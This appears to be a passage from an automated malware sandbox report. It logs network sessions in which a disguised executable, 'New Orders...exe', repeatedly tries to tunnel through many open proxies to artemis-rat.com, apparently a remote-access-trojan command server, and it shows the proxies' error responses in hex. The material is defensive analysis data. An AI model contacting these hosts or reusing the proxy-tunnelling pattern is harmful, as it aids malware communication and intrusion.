                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.24.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1295192.168.2.95371293.157.248.108887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.897948027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1296192.168.2.95371677.91.74.77807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.898380995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.234648943 CET129INHTTP/1.1 301 Moved Permanently
                                                                                        Location: https://artemis-rat.com:443
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1297192.168.2.953730138.2.73.15710807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.911428928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1298192.168.2.953726221.226.75.86554437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.916609049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.203927040 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1299192.168.2.953699117.160.250.132807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.916919947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.417785883 CET303INHTTP/1.1 400 Bad Request
                                                                                        Server: openresty
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 154
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1300192.168.2.953737119.3.215.4188887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.920659065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.728116035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1301192.168.2.953528117.160.250.133807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.929333925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.106539965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.802062035 CET303INHTTP/1.1 400 Bad Request
                                                                                        Server: openresty
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 154
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1302192.168.2.953851172.67.181.51807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.994005919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.148499966 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1303192.168.2.953850104.19.79.238807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.996711969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.152228117 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1304192.168.2.953858172.67.181.144807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.997612953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.152314901 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1305192.168.2.953801134.209.189.42807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.998090982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.289629936 CET327INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1306192.168.2.953846107.173.255.18312347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.003530025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1307192.168.2.95378191.189.177.18931287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.004266977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.337630033 CET1286INHTTP/1.1 403 Forbidden
                                                                                        Server: squid/5.7
                                                                                        Mime-Version: 1.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Content-Length: 3628
                                                                                        X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                        Vary: Accept-Language
                                                                                        Content-Language: en
                                                                                        X-Cache: MISS from lb1
                                                                                        X-Cache-Lookup: NONE from lb1:3128
                                                                                        Via: 1.1 lb1 (squid/5.7)
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1308192.168.2.95387535.190.107.16300007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.067516088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1309192.168.2.953768185.101.16.52807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.067516088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1310192.168.2.95379947.114.101.5788887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.068439007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.394532919 CET334INHTTP/1.1 400 Bad Request
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 204
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>tengine</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1311192.168.2.95379662.205.169.74532817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.070610046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.309537888 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1312192.168.2.953911104.17.239.10807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.072192907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.229948044 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
